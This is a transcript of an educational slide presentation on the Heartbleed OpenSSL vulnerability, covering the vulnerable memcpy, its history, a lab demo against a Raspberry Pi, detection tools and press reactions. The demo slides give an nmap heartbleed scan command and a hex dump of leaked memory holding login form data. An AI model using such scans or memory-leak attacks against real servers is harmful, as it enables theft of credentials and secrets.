Presentation is loading. Please wait.

Presentation is loading. Please wait.

The Heartbleed Bug A vulnerability in the OpenSSL Cryptographic Library.

Published byErick Norton Modified over 8 years ago

Similar presentations

Presentation on theme: "The Heartbleed Bug A vulnerability in the OpenSSL Cryptographic Library."— Presentation transcript:

1 The Heartbleed Bug A vulnerability in the OpenSSL Cryptographic Library

2 Agenda General overview of the vulnerability Process Heartbleed history Affected sites Exploitation of a vulnerable version of an Apache Server In the news…

3 Description of the vulnerability Vulnerable: program source files: t1_lib.c and d1_both.c functions are tls1_process_heartbeat() and dtls1_process_heartbeat() The actual breach: memcpy(bp, pl, payload) bp – final destination of the data that needs to be copied; pl – the location of the data that needs to be copied; payload – the amount of data to copy; There is no such thing of empty memory!

4 Process The attacker can grab 64K of memory per heartbeat Not limited to 1 grab! Common Vulnerabilities and Exposures reference: CVE-2014-0160 is the official reference to this bug. Extract sensitive information Read memory Exploit

5 History Dates back to 2011: Robin Seggelmann, Ph.D. student at the University of Duisburg – Essen implemented the Heartbeat Extension for OpenSSL Introduced in the source code repository on December 31, 2011 Was adopted with the release of OpenSSL version 1.0.1 on March 14, 2012 Heartbeat support was enabled by default and discovered on 1 st of April 2014 “The SSL/TLS encryption, by design and implementation it’s meant to protect the information.”

6 … some affected sites

7 Target Targeted machine: Linux Distribution for ARM Architecture on RaspberryPI OpenSSL between 1.0.1 – 1.0.1 f are vulnerable

8 Source Attack source: Kali Linux Distribution for ARM Architecture on RaspberryPI Nmap –p 443 –script=ssl-heartbleed.nse 192.168.0.105

9 Attack Attack source: To exploit this bug we used a custom mass auditing tool crafted by Rhaul Sasi

10 Attack Attack result: 0002c0b0 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 |e: application/x| 0002c0c0 2d 77 77 77 2d 66 6f 72 6d 2d 75 72 6c 65 6e 63 |-www-form-urlenc| 0002c0d0 6f 64 65 64 0d 0a 0d 0a 75 73 65 72 3d 45 72 69 |oded....user=Eri| 0002c0e0 6e 26 70 61 73 73 3d 70 61 73 73 77 6f 72 64 31 |n&pass=password1| 0002c0f0 4b 3a c2 1e 8c c3 dd 39 b1 e8 de 46 41 c7 98 76 |K:.....9...FA..v|

11 Observations Heartbeat can appear in different phases of the connection setup… IDS/IPS rules to detect heartbeat have been developed This does not require a MITM attack Only ways to protect is to upgrade to fixed version of OpenSSL or to recompile OpenSSL with the handshake removed from the code.

12 Am I vulnerable? Several services have been made available to test whether Heartbleed affects a given site: Tenable Network Security wrote a plugin for NESSUS Qualys added dedicated QIDs and developed SSLTest.com Nmap security scanner includes a Heartbleed detection script from version 6.45 Sourcefire has released Snort rules to detect Heartbleed attack traffic and possible response However, many services have been claimed to be ineffective for detecting the bug.

13 …in the news The Canada Revenue Agency reported the theft of Social Insurance Numbers belonging to 900 taxpayers in 6 hours! Bloomberg: NSA knew about this! Bruce Schneier: “Catastrophic is the right word. On the scale of 1 to 10, this is an 11. Half a million sites are vulnerable, including my own.”

14 OpenSSL Response Theo de Raadt, founder and leader of the OpenBSD and OpenSSH: “OpenSSL is not developed by a responsible team." OpenSSL core developer Ben Laurie: “OpenSSL is not reviewed by enough people” Software engineer John Walsh: "Think about it, OpenSSL only has two fulltime people to write, maintain, test, and review 500,000 lines of business critical code."

15 OpenSSL Response OpenSSL foundation’s president, Steve Marquess: “The mystery is not that a few overworked volunteers missed this bug; the mystery is why it hasn't happened more often." "The fact that the code change which caused the bug was done by an individual working at 23:00 on a New Year's Eve says a lot. The code simply wasn't reviewed enough and it went undetected for two years."

16 Thank you! There is higher chance to be a victim of online crime than real life crime!

Download ppt "The Heartbleed Bug A vulnerability in the OpenSSL Cryptographic Library."

Similar presentations

GHOST glibc gethostbyname() Vulnerability CVE-2015-0235 Johannes B. Ullrich, Ph.D. SANS Technology Institute https://isc.sans.edu.

GHOST glibc gethostbyname() Vulnerability CVE Johannes B. Ullrich, Ph.D. SANS Technology Institute
CSE 461 Section. “Transport Layer Security” protocol Standard protocol for encrypting Internet traffic Previously known as SSL (Secure Sockets Layer),

CSE 461 Section. “Transport Layer Security” protocol Standard protocol for encrypting Internet traffic Previously known as SSL (Secure Sockets Layer),
Heartbleed Bug. When all the net security people are freaking out, it’s probably an okay time to worry.

Heartbleed Bug. When all the net security people are freaking out, it’s probably an okay time to worry.
Suneeta Chawla Web Security Presentation Topic : IP Spoofing Date : 03/24/04.

Suneeta Chawla Web Security Presentation Topic : IP Spoofing Date : 03/24/04.
Abirami Poonkundran 2/22/10.  Goal  Introduction  Testing Methods  Testing Scope  My Focus  Current Progress  Explanation of Tools  Things to.

Abirami Poonkundran 2/22/10.  Goal  Introduction  Testing Methods  Testing Scope  My Focus  Current Progress  Explanation of Tools  Things to.
Vulnerability Analysis Borrowed from the CLICS group.

Vulnerability Analysis Borrowed from the CLICS group.
WiFi Security. What is WiFi ? Originally, Wi-Fi was a marketing term. The Wi-Fi certified logo means that the product has passed interoperability tests.

WiFi Security. What is WiFi ? Originally, Wi-Fi was a marketing term. The Wi-Fi certified logo means that the product has passed interoperability tests.
CSCI 530L Vulnerability Assessment. Process of identifying vulnerabilities that exist in a computer system Has many similarities to risk assessment Four.

CSCI 530L Vulnerability Assessment. Process of identifying vulnerabilities that exist in a computer system Has many similarities to risk assessment Four.
Mod Security (Is it worth it?) By Rich Helton. Abstract (see my paper for sources)  Based on statistics, Apache is the most used web server being used.

Mod Security (Is it worth it?) By Rich Helton. Abstract (see my paper for sources)  Based on statistics, Apache is the most used web server being used.
CS 290C: Formal Models for Web Software Lecture 1: Introduction Instructor: Tevfik Bultan.

CS 290C: Formal Models for Web Software Lecture 1: Introduction Instructor: Tevfik Bultan.
Browser Exploitation Framework (BeEF) Lab

Browser Exploitation Framework (BeEF) Lab
Security Comparisons of Open Source and Closed Source Programs Katherine Wright.

Security Comparisons of Open Source and Closed Source Programs Katherine Wright.
Continuous Integration for Databases Learn how to automate your build and test Steve Jones Red Gate Software Part II of the Continuous Delivery for Databases.

Continuous Integration for Databases Learn how to automate your build and test Steve Jones Red Gate Software Part II of the Continuous Delivery for Databases.
CD FY08 Tactical Plan Status FY08 Tactical Plan Status Report for Network Infrastructure Upgrades Rick Finnegan April 22, 2008.

CD FY08 Tactical Plan Status FY08 Tactical Plan Status Report for Network Infrastructure Upgrades Rick Finnegan April 22, 2008.
RFC6520 defines SSL Heartbeats - What are they? 1. SSL Heartbeats are used to keep a connection alive without the need to constantly renegotiate the SSL.

RFC6520 defines SSL Heartbeats - What are they? 1. SSL Heartbeats are used to keep a connection alive without the need to constantly renegotiate the SSL.
W3af LUCA ALEXANDRA ADELA – MISS 1. w3af  Web Application Attack and Audit Framework  Secures web applications by finding and exploiting web application.

W3af LUCA ALEXANDRA ADELA – MISS 1. w3af  Web Application Attack and Audit Framework  Secures web applications by finding and exploiting web application.
1 Integrating a Network IDS into an Open Source Cloud Computing Environment 1st International Workshop on Security and Performance in Emerging Distributed.

1 Integrating a Network IDS into an Open Source Cloud Computing Environment 1st International Workshop on Security and Performance in Emerging Distributed.
MSIT 458 – The Chinchillas. Offense Overview Botnet taxonomies need to be updated constantly in order to remain “complete” and are only as good as their.

MSIT 458 – The Chinchillas. Offense Overview Botnet taxonomies need to be updated constantly in order to remain “complete” and are only as good as their.
Chapter-4 Windows 2000 Professional Win2K Professional provides a very usable interface and was designed for use in the desktop PC. Microsoft server system.

Chapter-4 Windows 2000 Professional Win2K Professional provides a very usable interface and was designed for use in the desktop PC. Microsoft server system.
XA R7.8 Upgrade Process and Technical Overview Ruth Anne Pharr Sr. IT Consultant, CISTECH Inc.

XA R7.8 Upgrade Process and Technical Overview Ruth Anne Pharr Sr. IT Consultant, CISTECH Inc.

Similar presentations

Ads by Google